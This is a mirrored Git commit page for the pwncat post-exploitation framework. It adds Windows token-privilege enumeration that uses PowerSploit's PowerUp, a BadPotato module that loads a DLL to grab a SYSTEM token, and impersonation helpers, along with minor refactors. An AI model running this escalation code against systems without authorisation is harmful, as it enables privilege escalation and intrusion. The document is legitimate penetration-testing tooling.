mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-24 01:25:37 +01:00
Merge pull request #144 from calebstewart/issue-106-token-impersonation-ability
[FEATURE #106] Token Impersonation Ability and BadPotato PoC
This commit is contained in:
commit
ca37f74b37
@ -14,6 +14,7 @@ and simply didn't have the time to go back and retroactively create one.
|
||||
- Added query-string arguments to connection strings for both the entrypoint
|
||||
and the `connect` command.
|
||||
- Added Enumeration States to allow session-bound enumerations
|
||||
- Added Windows privilege escalation via BadPotato plugin ([#106](https://github.com/calebstewart/pwncat/issues/106))
|
||||
|
||||
## [0.4.3] - 2021-06-18
|
||||
Patch fix release. Major fixes are the correction of file IO for LinuxWriters and
|
||||
|
@ -1,10 +1,92 @@
|
||||
"""
|
||||
Windows-specific facts which are used in multiple places throughout the framework.
|
||||
"""
|
||||
from typing import List, Optional
|
||||
from enum import IntFlag
|
||||
from typing import List, Callable, Optional
|
||||
from datetime import datetime
|
||||
|
||||
from pwncat.facts import User, Group
|
||||
import pwncat
|
||||
from pwncat.facts import Fact, User, Group, ExecuteAbility
|
||||
from pwncat.modules import ModuleFailed
|
||||
from pwncat.platform import PlatformError
|
||||
|
||||
|
||||
class LuidAttribute(IntFlag):
|
||||
DISABLED = 0x00000000
|
||||
SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001
|
||||
SE_PRIVILEGE_ENABLED = 0x00000002
|
||||
SE_PRIVILEGE_REMOVED = 0x00000004
|
||||
SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000
|
||||
|
||||
|
||||
class ProcessTokenPrivilege(Fact):
|
||||
"""Describes a specific privilege"""
|
||||
|
||||
def __init__(self, source: str, name: str, attributes: int, handle: int, pid: int):
|
||||
super().__init__(source=source, types=["token.privilege"])
|
||||
|
||||
self.name = name
|
||||
self.attributes = LuidAttribute(attributes)
|
||||
self.handle = handle
|
||||
self.pid = pid
|
||||
|
||||
def title(self, session: "pwncat.manager.Session"):
|
||||
attributes = str(self.attributes).removeprefix("LuidAttribute.").split("|")
|
||||
|
||||
for i in range(len(attributes)):
|
||||
if attributes[i] == "DISABLED":
|
||||
attributes[i] = "[red]DISABLED[/red]"
|
||||
else:
|
||||
attributes[i] = f"[blue]{attributes[i]}[/blue]"
|
||||
|
||||
return f"[cyan]{self.name}[/cyan] => {'|'.join(attributes)}"
|
||||
|
||||
|
||||
class UserToken(ExecuteAbility):
|
||||
def __init__(self, source: str, uid: str, token: int):
|
||||
super().__init__(source=source, source_uid=None, uid=uid)
|
||||
self.types.append("token")
|
||||
|
||||
self.token = token
|
||||
|
||||
def can_impersonate(self, session: "pwncat.manager.Session"):
|
||||
"""Test if the current session can impersonate tokens"""
|
||||
|
||||
for priv in session.run("enumerate", types=["token.privilege"]):
|
||||
if (
|
||||
priv.name == "SeImpersonatePrivilege"
|
||||
and LuidAttribute.SE_PRIVILEGE_ENABLED in priv.attributes
|
||||
):
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
def title(self, session: "pwncat.manager.Session"):
|
||||
|
||||
user = session.find_user(uid=self.uid)
|
||||
if user is None:
|
||||
user_name = f"SID({repr(self.uid)})"
|
||||
else:
|
||||
user_name = user.name
|
||||
|
||||
if self.can_impersonate(session):
|
||||
return f"[red]Impersonatable[/red] [blue]{user_name}[/blue] Token: {self.token}"
|
||||
return f"[blue]{user_name}[/blue] Token: {self.token}"
|
||||
|
||||
def shell(
|
||||
self, session: "pwncat.manager.Session"
|
||||
) -> Callable[["pwncat.manager.Session"], None]:
|
||||
"""Execute a new shell as the specified user. In this case, just impersonate the user."""
|
||||
|
||||
if not self.can_impersonate(session):
|
||||
raise ModuleFailed("impersonate privilege not enabled")
|
||||
|
||||
try:
|
||||
session.platform.impersonate(self.token)
|
||||
except PlatformError as exc:
|
||||
raise ModuleFailed(f"failed to impersonate token: {exc}")
|
||||
|
||||
return lambda session: session.platform.revert_to_self()
|
||||
|
||||
|
||||
class WindowsUser(User):
|
||||
|
@ -25,7 +25,7 @@ class Module(EnumerateModule):
|
||||
user in the running session with the new user."""
|
||||
|
||||
PLATFORM = None
|
||||
SCHEDULE = Schedule.PER_USER
|
||||
SCHEDULE = Schedule.ALWAYS
|
||||
PROVIDES = ["escalate.replace"]
|
||||
|
||||
def enumerate(self, session: "pwncat.manager.Session"):
|
||||
|
@ -161,9 +161,15 @@ class EnumerateModule(BaseModule):
|
||||
fact for fact in session.target.facts if fact.source != self.name
|
||||
]
|
||||
|
||||
if self.name in session.target.enumerate_state:
|
||||
del session.target.enumerate_state[self.name]
|
||||
|
||||
if self.SCOPE is Scope.SESSION:
|
||||
session.facts = [fact for fact in session.facts if fact.source != self.name]
|
||||
|
||||
if self.name in session.enumerate_state:
|
||||
del session.enumerate_state[self.name]
|
||||
|
||||
return []
|
||||
|
||||
def _mark_complete(self, session: "pwncat.manager.Session"):
|
||||
@ -225,9 +231,6 @@ class EnumerateModule(BaseModule):
|
||||
:type cache: bool
|
||||
"""
|
||||
|
||||
# Retrieve the DB target object
|
||||
target = session.target
|
||||
|
||||
if clear:
|
||||
self._clear_cache(session)
|
||||
return
|
||||
@ -261,11 +264,7 @@ class EnumerateModule(BaseModule):
|
||||
continue
|
||||
|
||||
# Only add the item if it doesn't exist
|
||||
for f in target.facts:
|
||||
if f == item:
|
||||
break
|
||||
else:
|
||||
session.register_fact(item, self.SCOPE, commit=False)
|
||||
session.register_fact(item, self.SCOPE, commit=False)
|
||||
|
||||
# Don't yield the actual fact if we didn't ask for this type
|
||||
if not types or any(
|
||||
|
0
pwncat/modules/windows/enumerate/token/__init__.py
Normal file
0
pwncat/modules/windows/enumerate/token/__init__.py
Normal file
40
pwncat/modules/windows/enumerate/token/potato.py
Normal file
40
pwncat/modules/windows/enumerate/token/potato.py
Normal file
@ -0,0 +1,40 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import pwncat
|
||||
from pwncat.modules import Status, ModuleFailed
|
||||
from pwncat.facts.windows import UserToken
|
||||
from pwncat.platform.windows import Windows, ProtocolError
|
||||
from pwncat.modules.enumerate import Scope, Schedule, EnumerateModule
|
||||
|
||||
|
||||
class Module(EnumerateModule):
|
||||
"""Execute the BadPotato expoit to leak a SYSTEM user token"""
|
||||
|
||||
PLATFORM = [Windows]
|
||||
SCHEDULE = Schedule.PER_USER
|
||||
SCOPE = Scope.SESSION
|
||||
PROVIDES = ["token", "ability.execute"]
|
||||
|
||||
def enumerate(self, session: "pwncat.manager.Session"):
|
||||
|
||||
# Non-admin users will crash the C2 if we try bad potato
|
||||
if not session.platform.is_admin():
|
||||
return
|
||||
|
||||
try:
|
||||
# Load the badpotato plugin
|
||||
yield Status("loading badpotato c2 plugin...")
|
||||
badpotato = session.platform.dotnet_load("BadPotato.dll")
|
||||
|
||||
# Grab a system token
|
||||
yield Status("triggering badpotato exploit...")
|
||||
token = badpotato.get_system_token()
|
||||
|
||||
# Yield the new SYSTEM token
|
||||
yield UserToken(
|
||||
source=self.name,
|
||||
uid=session.find_user(name="NT AUTHORITY\\SYSTEM").id,
|
||||
token=token,
|
||||
)
|
||||
except ProtocolError as exc:
|
||||
raise ModuleFailed(f"failed to load badpotato: {exc}")
|
35
pwncat/modules/windows/enumerate/token/privs.py
Normal file
35
pwncat/modules/windows/enumerate/token/privs.py
Normal file
@ -0,0 +1,35 @@
|
||||
#!/usr/bin/env python3
|
||||
import pwncat
|
||||
from pwncat.modules import ModuleFailed
|
||||
from pwncat.facts.windows import ProcessTokenPrivilege
|
||||
from pwncat.platform.windows import Windows, PowershellError
|
||||
from pwncat.modules.enumerate import Scope, Schedule, EnumerateModule
|
||||
|
||||
|
||||
class Module(EnumerateModule):
|
||||
"""Locate process privileges"""
|
||||
|
||||
PLATFORM = [Windows]
|
||||
SCHEDULE = Schedule.PER_USER
|
||||
SCOPE = Scope.SESSION
|
||||
PROVIDES = ["token.privilege"]
|
||||
|
||||
def enumerate(self, session: "pwncat.manager.Session"):
|
||||
"""Check for privileges"""
|
||||
|
||||
# Load PowerUp.ps1
|
||||
session.run("powersploit", group="privesc")
|
||||
|
||||
try:
|
||||
privs = session.platform.powershell("Get-ProcessTokenPrivilege")[0]
|
||||
except (IndexError, PowershellError) as exc:
|
||||
raise ModuleFailed(f"failed to find process token privs: {exc}")
|
||||
|
||||
for priv in privs:
|
||||
yield ProcessTokenPrivilege(
|
||||
source=self.name,
|
||||
name=priv["Privilege"],
|
||||
attributes=priv["Attributes"],
|
||||
handle=priv["TokenHandle"],
|
||||
pid=priv["ProcessId"],
|
||||
)
|
@ -17,10 +17,7 @@ def do_file_test(session, content):
|
||||
|
||||
# In some cases, the act of reading/writing causes a shell to hang
|
||||
# so double check that.
|
||||
result = session.platform.run(
|
||||
["echo", "hello world"], capture_output=True, text=True
|
||||
)
|
||||
assert result.stdout == "hello world\n"
|
||||
assert len(list(session.platform.Path("/").iterdir())) > 0
|
||||
|
||||
|
||||
def test_small_text(session):
|
||||
|
Loading…
Reference in New Issue
Block a user